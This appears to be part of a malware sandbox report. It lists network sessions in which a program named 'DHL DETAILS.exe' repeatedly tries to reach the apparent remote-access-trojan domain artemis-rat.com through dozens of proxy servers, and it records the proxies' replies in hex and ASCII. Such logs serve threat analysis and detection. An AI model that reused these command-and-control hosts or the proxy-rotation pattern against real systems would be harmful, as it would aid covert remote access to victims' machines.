                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-seri


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1525192.168.2.55445943.133.136.20888006352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.626740932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1526192.168.2.554591198.37.57.112806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.626979113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.858072996 CET503INHTTP/1.1 400 Bad Request
                                                                                    Content-Type: text/html; charset=us-ascii
                                                                                    Server: Microsoft-HTTPAPI/2.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Connection: close
                                                                                    Content-Length: 324
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 20 2d 20 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 55 52 4c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request - Invalid URL</h2><hr><p>HTTP Error 400. The request URL is invalid.</p></BODY></HTML>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1527192.168.2.554486138.2.73.15710806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.627448082 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1528192.168.2.554548147.75.92.251806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.628784895 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.906400919 CET356INHTTP/1.0 502 Bad Gateway
                                                                                    Server: Zscaler/6.3
                                                                                    Content-Type: text/html
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 31 3e 44 4e 53 20 65 72 72 6f 72 3c 2f 68 31 3e 0d 0a 3c 70 3e 44 4e 53 20 65 72 72 6f 72 20 28 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 6f 66 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 29 3c 62 72 3e 3c 62 72 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 73 70 65 6c 6c 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 62 72 3e 3c 2f 70 3e 0d 0a 3c 21 2d 2d 5a 73 63 61 6c 65 72 2f 36 2e 33 2d 2d 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><h1>DNS error</h1><p>DNS error (the host name of the page you are looking for does not exist)<br><br>Please check that the host name has been spelled correctly.<br></p>...Zscaler/6.3--></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1529192.168.2.54997391.134.140.160530126352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.629282951 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.224282980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.833408117 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:22.036649942 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:24.520971060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:26.895567894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.270610094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.146239996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1530192.168.2.55454213.37.89.20131286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.631304026 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.927459955 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1531192.168.2.554533172.104.251.179806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.631613970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.932701111 CET327INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 166
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1532192.168.2.55450834.95.243.12280816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.631688118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1533192.168.2.5545268.217.44.229156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.631689072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1534192.168.2.54996714.207.167.11480806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.631840944 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:22.723858118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:25.833216906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:31.834108114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.660315037 CET19INHTTP/1.1 200 OK


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1535192.168.2.554543185.38.111.180806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.634630919 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.955749035 CET75INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Content-Length: 0
                                                                                    Mar 9, 2024 13:14:20.280675888 CET103INHTTP/1.1 400 Bad Request
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74
                                                                                    Data Ascii: 400 Bad Request


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1536192.168.2.549944103.229.83.10667896352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.635240078 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1537192.168.2.554670172.67.181.9806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.637116909 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.799031019 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1538192.168.2.55483243.152.192.2174436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.638803005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1539192.168.2.554674104.19.109.209806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.639290094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.799468994 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:19 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1540192.168.2.55483343.152.192.2174436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.639506102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1541192.168.2.55483543.152.192.2174436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.640636921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1542192.168.2.55483843.152.192.2174436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.641194105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1543192.168.2.553146118.172.47.97513276352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.641885996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1544192.168.2.554544221.224.44.9173026352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.645004034 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1545192.168.2.554556153.139.233.21880806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.647789955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1546192.168.2.55456043.155.170.35156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:19.651355028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1547192.168.2.554590160.153.245.187317456352C:\Users\user\Desktop\DHL DETAILS.exe
